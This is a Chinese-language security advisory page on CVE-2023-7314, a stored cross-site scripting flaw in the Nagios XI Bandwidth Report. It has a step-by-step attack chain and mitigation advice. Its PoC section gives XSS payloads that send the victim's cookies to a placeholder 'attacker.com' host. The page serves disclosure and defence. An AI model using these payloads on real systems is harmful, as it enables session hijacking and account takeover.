CVE-2023-7314 CVSS 5.4 中危

CVE-2023-7314 Nagios XI Bandwidth Report跨站脚本漏洞

披露日期: 2025-10-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-7314

漏洞类型

XSS（跨站脚本）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI

漏洞概述

CVE-2023-7314是Nagios XI网络监控软件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于Bandwidth Report（带宽报告）组件中，由于对用户输入的验证和转义处理不足，攻击者可以注入恶意JavaScript代码。当其他用户（尤其是管理员）查看包含恶意代码的报告时，攻击者可以在受害者的浏览器上下文中执行任意脚本，从而窃取会话令牌、劫持用户账户或进行进一步的攻击。由于Nagios XI通常以高权限运行，攻击者成功利用此漏洞可能导致严重的横向移动和数据泄露风险。

技术细节

该漏洞的根本原因在于Nagios XI的Bandwidth Report组件对用户可控的输入参数缺少适当的输入验证和输出编码。攻击者可以通过构造特殊的JavaScript payload（如<script>alert(document.cookie)</script>）作为报告参数值。当系统生成带宽报告时，未经过滤的用户输入被直接嵌入到HTML页面中，导致恶意脚本在受害者浏览器中执行。攻击者利用此漏洞可以窃取受害者的认证凭证、进行会话劫持、或利用管理员权限执行系统命令。由于该漏洞位于报告生成模块，影响所有查看特定报告的用户，属于存储型XSS，危害较大。

攻击链分析

STEP 1

步骤1

攻击者登录Nagios XI系统，获取低权限用户账户

STEP 2

步骤2

导航至Bandwidth Report组件功能模块

STEP 3

步骤3

在报告参数（如主机名、时间范围等）中注入恶意XSS payload

STEP 4

步骤4

提交报告请求，恶意脚本被存储在系统数据库中

STEP 5

步骤5

管理员或其他用户访问该带宽报告页面

STEP 6

步骤6

恶意脚本在受害者浏览器中执行，窃取cookie或执行其他恶意操作

STEP 7

步骤7

攻击者利用窃取的凭证进行横向移动或进一步入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2023-7314 Nagios XI Bandwidth Report XSS PoC -->
<!-- Injected via Bandwidth Report parameter -->

<!-- Basic XSS Payload -->
<script>alert(document.cookie)</script>

<!-- Cookie Stealing Payload -->
<script>
  fetch('https://attacker.com/steal?c=' + btoa(document.cookie));
</script>

<!-- Session Hijacking Payload -->
<img src=x onerror='fetch("https://attacker.com/log?data="+document.cookie)'>

<!-- Stored XSS via Report Parameter -->
<svg/onload=fetch('https://attacker.com/cookie?c='+document.cookie)>

影响范围

Nagios XI < 5.11.3

防御指南

临时缓解措施

在官方补丁发布前，可临时禁用Bandwidth Report组件功能，或通过WAF规则过滤报告中潜在的XSS payload（如<script>、<img src=x>、onerror等关键词）。同时限制低权限用户访问报告生成功能，并对所有报告输出实施严格的HTML编码。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表